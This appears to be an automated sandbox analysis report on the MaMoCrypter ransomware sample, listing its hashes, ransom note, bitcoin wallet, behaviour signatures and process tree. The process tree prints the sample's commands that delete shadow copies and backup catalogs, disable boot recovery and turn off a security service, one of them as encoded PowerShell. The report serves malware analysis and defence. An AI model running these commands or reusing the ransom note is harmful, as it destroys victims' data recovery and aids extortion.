Analysis

  • max time kernel
    62s
  • max time network
    113s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    21/07/2020, 16:18

General

  • Target

    MaMoCrypter.bin.exe

  • Size

    922KB

  • MD5

    0889138a3894284e97b61f9a310e3e7d

  • SHA1

    6c51969b1b1686abd8220191e12e647ab7312517

  • SHA256

    5063ae08ea15ab78bd9062ca0d0813c0682a22583ecd1830efeb6afcc2dd45d8

  • SHA512

    23317713644609a71953fc632478ee638d818bbb675e4f4ca00226cb4006a631800b3fe35c57aa85078f54155cb5d5c409e37fff25fc8315ee702a30c18f6f18

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\How Do I Recover My Files (Readme).txt

Ransom Note
* What happened to my files? Your important files are encrypted. Many of your documents, photos, videos, databases, and other files are no longer accessible because they are encrypted. Maybe you're busy finding a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. However, if you want to use the programs of data recovery companies, please do not work on your original files, but make copies of them. Corruption of the actual files can cause irreversible damage to your data. * Can I Recover My Files? Sure. We guarantee that you can recover all your files safely and easily. But for this you need to send $300 worth bitcoins to our address. Even if you give money, Do not believe the people around you who say they will not give your files, I Have Enough Reference To Give You Confidence. I don't know about you, so there is no point in having bad feelings towards you, doing evil to you, my goal is just to earn an income from this business. * What about the guarantees? This is just a job. We never care about you and your deals. If we do not fulfill our work and obligations - no one will cooperate with us. If you do not believe us, tell us any 1 or 2 files with SIMPLE extensions (jpg, xls, doc, etc ... not databases!) And low size (max 1 mb) 1 or 2 file and following special public and private mzrevenge keys produced for you send us we will decrypt these files and send it back to you. This is our guarantee. * How to contact with you? You can write us to our mailbox: [email protected] Don't forget, check your "Spam" or "Junk" folder it you can't get more than 6 hours of answer. * How will the decryption process proceed after payment? After payment, we will send you our special decoder program by mail, just open it, then it will automatically decrypt all your files. but you need to pay for it and contact us. * So what is Bitcoin and how to get it? The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ If you are ready to pay the money we want, Bitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd These are public and private MZREVENGE decryption keys produced for you. If these keys are damaged, nobody can recovery your files. ============================{ PUBLIC MZREVENGE KEY }============================= MZRKEYPUBLICUDorwqHDjcORw7cyw6jCpTzCkU4RYcO5PcO3wpzCkcOEwrnDhH/DpsO0wp7DvA7Cq8OBw58kZVDDl8ODDsKGwpbCuMKCwoLCgExsAsOjwoBxesKfQ8ONwrFbwo1HQsKaYXIxO3N8fHnCncO+TC3CvcK4NMKkwqHDi2JYGgXDpn8FehPCnm96wrXCqsOEwpFPw6g6wrrDncOFw59Dw4XCsMObw65rJ8OKMxTCk15vw65NM8KjMhXCpisBwrbDgcOXJ8KAw6jDgsOVbmLDg8KBesOww7zDpk7DvAtxw5DCswPDqcOBwrHCi3zCt8OxZ8O0ZcOQwrASwprDvQbCl8O8QMKHLAvCtULDjXHDt8OoPHBpwoJKSjLCi8KHwp3CosOHZmhnZzo4a2rDqXJ6wqbDgT4QZjg+w7R/fG88w4XCvinDg05qwqTCmMOzw6PCjcK9ccOLwrvCkwzCsynCp0PDkEBhw7TDtcKuC8O3w6PDrMKyNjPChT1Ew7TDn8KewrjDmD1NRGvDvh1dwqg1wqbDl8O5WHd2wrHDoMKYwq0jw4t6YhbDvMO6HWkEHCIVwobDohbDg8OsOsO1wofDi8K2w4TDnwTDt8KjJMK9ZTpNPAwyD8KNf2jCsU5qw7xiwpB5wrhfEQ== ================================================================================= ============================{ PRIVATE MZREVENGE KEY }============================ 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 =================================================================================
Wallets

3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd

Signatures

  • Suspicious use of WriteProcessMemory 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • System policy modification 1 TTPs 17 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies service 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Program crash 1 IoCs
  • UAC bypass 3 TTPs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • System policy modification
      • Checks whether UAC is enabled
      • Executes dropped EXE
      • Drops file in Drivers directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      PID:3896
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:752
        • C:\Windows\SysWOW64\sc.exe
          sc config "AppCheck" start=disabled
          4⤵
            PID:3684
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:740
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:556
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1228
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
          3⤵
            PID:1712
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 704
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious behavior: EnumeratesProcesses
              • Program crash
              PID:1368
          • C:\Windows\SysWOW64\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\How Do I Recover My Files (Readme).txt
            3⤵
              PID:1888
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          • Modifies service
          PID:856

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1368-8-0x0000000004A90000-0x0000000004A91000-memory.dmp

          Filesize

          4KB

        • memory/1368-14-0x00000000051C0000-0x00000000051C1000-memory.dmp

          Filesize

          4KB